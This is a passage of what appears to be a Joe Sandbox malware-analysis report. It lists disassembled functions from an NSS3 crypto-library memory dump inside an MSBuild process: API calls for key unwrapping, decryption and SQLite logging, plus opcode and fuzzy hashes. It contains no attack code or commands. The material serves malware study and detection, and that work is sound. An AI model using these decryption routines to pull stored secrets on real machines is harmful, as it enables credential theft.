                                                                                        • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                        • API String ID: 601260978-871931242
                                                                                        • Opcode ID: 145f6c29fe2fa905bba7677d48f27ab3952ffc4ebfd166182bcc395293e9c0c9
                                                                                        • Instruction ID: 92d0d9b2dcadfa85d8142c29486c029421239ee5b2e3c438eca02d1f035bbad7
                                                                                        • Opcode Fuzzy Hash: 145f6c29fe2fa905bba7677d48f27ab3952ffc4ebfd166182bcc395293e9c0c9
                                                                                        • Instruction Fuzzy Hash: 6111D6A6E0252117E7116B762E4299B38585B4710EF18C934D815E5F02FF22D70C87FA
                                                                                        Function 6C6C4540 Relevance: 25.8, APIs: 17, Instructions: 349COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PK11_MakeIDFromPubKey.NSS3(00000000), ref: 6C6C4590
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C471C
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C477C
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6C479A
                                                                                        • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C6C484A
                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C6C4858
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C486A
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C487E
                                                                                          • Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
                                                                                          • Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4
                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C6C488C
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C489C
                                                                                        • PK11_GetInternalSlot.NSS3 ref: 6C6C48B2
                                                                                        • PK11_UnwrapPrivKey.NSS3(00000000,00000130,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,6C6A7F9D), ref: 6C6C48EC
                                                                                        • SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C6C492A
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C4949
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C4977
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C4987
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C499B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item_UtilZfree$K11_$CriticalErrorFreeSectionValue$DestroyEnterFromInternalLeaveMakePrivPrivateSlotUnlockUnwrap
                                                                                        • String ID:
                                                                                        • API String ID: 1673584487-0
                                                                                        • Opcode ID: 55cd4b6a6cc094b8d2bff1dd5b418e2bacee0b29d2f4f5de4e5611c5faa0bde9
                                                                                        • Instruction ID: 7e58ce71319929a06d21931c962b6dc19f3b2a6eb56d55648d77801e89024513
                                                                                        • Opcode Fuzzy Hash: 55cd4b6a6cc094b8d2bff1dd5b418e2bacee0b29d2f4f5de4e5611c5faa0bde9
                                                                                        • Instruction Fuzzy Hash: 29E18D71E002699FDB20CF14CC44BEEBBB5EF04308F1485A9E819A7751E7729A94CF99
                                                                                        Function 6C6F0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(*,ol), ref: 6C6F0C81
                                                                                          • Part of subcall function 6C6DBE30: SECOID_FindOID_Util.NSS3(6C69311B,00000000,?,6C69311B,?), ref: 6C6DBE44
                                                                                          • Part of subcall function 6C6C8500: SECOID_GetAlgorithmTag_Util.NSS3(6C6C95DC,00000000,00000000,00000000,?,6C6C95DC,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C8517
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F0CC4
                                                                                          • Part of subcall function 6C6DFAB0: free.MOZGLUE(?,-00000001,?,?,6C67F673,00000000,00000000), ref: 6C6DFAC7
                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6F0CD5
                                                                                        • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C6F0D1D
                                                                                        • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C6F0D3B
                                                                                        • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C6F0D7D
                                                                                        • free.MOZGLUE(00000000), ref: 6C6F0DB5
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F0DC1
                                                                                        • free.MOZGLUE(00000000), ref: 6C6F0DF7
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F0E05
                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6F0E0F
                                                                                          • Part of subcall function 6C6C95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C95E0
                                                                                          • Part of subcall function 6C6C95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C95F5
                                                                                          • Part of subcall function 6C6C95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C6C9609
                                                                                          • Part of subcall function 6C6C95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6C961D
                                                                                          • Part of subcall function 6C6C95C0: PK11_GetInternalSlot.NSS3 ref: 6C6C970B
                                                                                          • Part of subcall function 6C6C95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C6C9756
                                                                                          • Part of subcall function 6C6C95C0: PK11_GetIVLength.NSS3(?), ref: 6C6C9767
                                                                                          • Part of subcall function 6C6C95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C6C977E
                                                                                          • Part of subcall function 6C6C95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C978E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                        • String ID: *,ol$*,ol$-$ol
                                                                                        • API String ID: 3136566230-3848321967
                                                                                        • Opcode ID: 5319c04c76b2e39226f751383a71b2b52d61223db96ce6a35b1a83fd46888c52
                                                                                        • Instruction ID: 34283563ebda4d4709a60c9d19a4bbde3e3fcebedae9528eb24ee52544609efe
                                                                                        • Opcode Fuzzy Hash: 5319c04c76b2e39226f751383a71b2b52d61223db96ce6a35b1a83fd46888c52
                                                                                        • Instruction Fuzzy Hash: B241F2B1901246ABEB009F64DC45BEF76B9EF0530CF144024E92567741EB35AA15CBFA
                                                                                        Function 6C6B6650 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 117COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_DecryptInit), ref: 6C6B6676
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B66A4
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B66B3
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B66C9
                                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C6B66E8
                                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C6B6716
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B6728
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B673E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: hKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptInit$nyl
                                                                                        • API String ID: 1003633598-3547332360
                                                                                        • Opcode ID: a19f75756d7e0093cce72d129a263ef817faa179dbadb1badb22b02e38044a19
                                                                                        • Instruction ID: b3d9b15ba188eb4ea4fa506794abfbd9808331960895beb0998d6fa20d66ebe3
                                                                                        • Opcode Fuzzy Hash: a19f75756d7e0093cce72d129a263ef817faa179dbadb1badb22b02e38044a19
                                                                                        • Instruction Fuzzy Hash: E841B832601115EBD704DF54DE8CF9A7775EB4A35DF044434E908AB611DF30A929CBAE
                                                                                        Function 6C6B6500 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_EncryptFinal), ref: 6C6B6526
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B6554
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B6563
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B6579
                                                                                        • PR_LogPrint.NSS3( pLastEncryptedPart = 0x%p,?), ref: 6C6B6595
                                                                                        • PR_LogPrint.NSS3( pulLastEncryptedPartLen = 0x%p,?), ref: 6C6B65B0
                                                                                        • PR_LogPrint.NSS3( *pulLastEncryptedPartLen = 0x%x,?), ref: 6C6B661A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: *pulLastEncryptedPartLen = 0x%x$ hSession = 0x%x$ pLastEncryptedPart = 0x%p$ pulLastEncryptedPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_EncryptFinal$nyl
                                                                                        • API String ID: 1003633598-1952597278
                                                                                        • Opcode ID: 89041dd3d658252222c53016398a7be4d380e4da5b088c72e75629c45685c807
                                                                                        • Instruction ID: 69498edf5d441c05692233a156751306596b077cc0eca29ce33185ae6a5304b1
                                                                                        • Opcode Fuzzy Hash: 89041dd3d658252222c53016398a7be4d380e4da5b088c72e75629c45685c807
                                                                                        • Instruction Fuzzy Hash: 3031A732601145EFDB44DF54DE8CB9A7BB5EB4A319F044434E908E7A11DF30DA68CBAA
                                                                                        Function 6C6E6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C7B1DE0,?), ref: 6C6E6CFE
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6E6D26
                                                                                        • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C6E6D70
                                                                                        • PORT_Alloc_Util.NSS3(00000480), ref: 6C6E6D82
                                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6C6E6DA2
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6E6DD8
                                                                                        • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C6E6E60
                                                                                        • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C6E6F19
                                                                                        • PK11_DigestBegin.NSS3(00000000), ref: 6C6E6F2D
                                                                                        • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C6E6F7B
                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6E7011
                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C6E7033
                                                                                        • free.MOZGLUE(?), ref: 6C6E703F
                                                                                        • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C6E7060
                                                                                        • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C6E7087
                                                                                        • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C6E70AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                        • String ID:
                                                                                        • API String ID: 2108637330-0
                                                                                        • Opcode ID: 9e0acc2e5000fb8c3a6ef946ac2162eb0b98a86d1d2790855bc4f7fd30954af5
                                                                                        • Instruction ID: 33dc587034fdf5771f8922edf0feb5213736d785bb5f771706ae545a445c6e30
                                                                                        • Opcode Fuzzy Hash: 9e0acc2e5000fb8c3a6ef946ac2162eb0b98a86d1d2790855bc4f7fd30954af5
                                                                                        • Instruction Fuzzy Hash: 6CA119B190E2049BEB009B24DC45B9A3295DB8931CF24493BEA19CBBC1F775D845C75B
                                                                                        Function 6C6CE550 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 384COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6CE5A0
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C6CE5F2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorValuememcpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 3044119603-4108050209
                                                                                        • Opcode ID: ab2621726d19c9de2f9cbd22893feb969ca2c069c919defbaea4277a1b3a1674
                                                                                        • Instruction ID: 51f096913bdb67af37961c7a49c6dc95c6695db0be897b6fb59c99e1b5c075d7
                                                                                        • Opcode Fuzzy Hash: ab2621726d19c9de2f9cbd22893feb969ca2c069c919defbaea4277a1b3a1674
                                                                                        • Instruction Fuzzy Hash: B4F17CB1A002299FDB218F24CC85BDA77B5FF49318F0441A8E908A7641E775EE94CFD9
                                                                                        Function 6C6A2C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(#?jl,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C62
                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C76
                                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C86
                                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C93
                                                                                          • Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
                                                                                          • Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2CC6
                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2CDA
                                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23), ref: 6C6A2CEA
                                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?), ref: 6C6A2CF7
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?), ref: 6C6A2D4D
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6A2D61
                                                                                        • PL_HashTableLookup.NSS3(?,?), ref: 6C6A2D71
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6A2D7E
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                        • String ID: #?jl
                                                                                        • API String ID: 2446853827-1742918463
                                                                                        • Opcode ID: 43d88a4825ed76b7fc6b5277db282ef34614e39f5987c2b8904da497951c5270
                                                                                        • Instruction ID: 00c4badea49c73e309dfdcb5882c52c6a46dc19183c65225998453843c61988b
                                                                                        • Opcode Fuzzy Hash: 43d88a4825ed76b7fc6b5277db282ef34614e39f5987c2b8904da497951c5270
                                                                                        • Instruction Fuzzy Hash: AE5105B6D00605ABDB009F64DC458AAB7B8BF0A34CB048530ED1C97B12EB31ED55C7E9
                                                                                        Function 6C75A4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C75A4E6
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C75A4F9
                                                                                        • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C75A553
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C75A5AC
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C75A5F7
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C75A60C
                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C75A633
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C75A671
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C75A69A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                        • API String ID: 2358773949-598938438
                                                                                        • Opcode ID: 25057cab6842bff9ec719db0bc2efb8ef7ea5038d85976daa1a4ec3e6437d8fa
                                                                                        • Instruction ID: ff357d0e7c91781276d52a3f56325f89951bc70961a4051da94ebb24381fffb0
                                                                                        • Opcode Fuzzy Hash: 25057cab6842bff9ec719db0bc2efb8ef7ea5038d85976daa1a4ec3e6437d8fa
                                                                                        • Instruction Fuzzy Hash: D251A5B1908305EFDB01CF25DA84A6A7BE0FF44328F444879F88947651EB31D9A4CBA3
                                                                                        Function 6C6845B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 135memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,6C681984,?), ref: 6C6845F2
                                                                                        • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6845FB
                                                                                          • Part of subcall function 6C6E0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E08B4
                                                                                        • SECITEM_CompareItem_Util.NSS3(00000000,-00000001), ref: 6C68461E
                                                                                          • Part of subcall function 6C6DFCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6C684101,00000000,?,?,?,6C681666,?,?), ref: 6C6DFCF2
                                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,?,-00000019), ref: 6C684646
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C684662
                                                                                        • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C68467A
                                                                                        • PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C684691
                                                                                        • PL_FreeArenaPool.NSS3 ref: 6C6846A3
                                                                                        • PL_FinishArenaPool.NSS3 ref: 6C6846AB
                                                                                        • free.MOZGLUE(?), ref: 6C6846BC
                                                                                        • PORT_ZAlloc_Util.NSS3(?), ref: 6C6846E5
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C684717
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
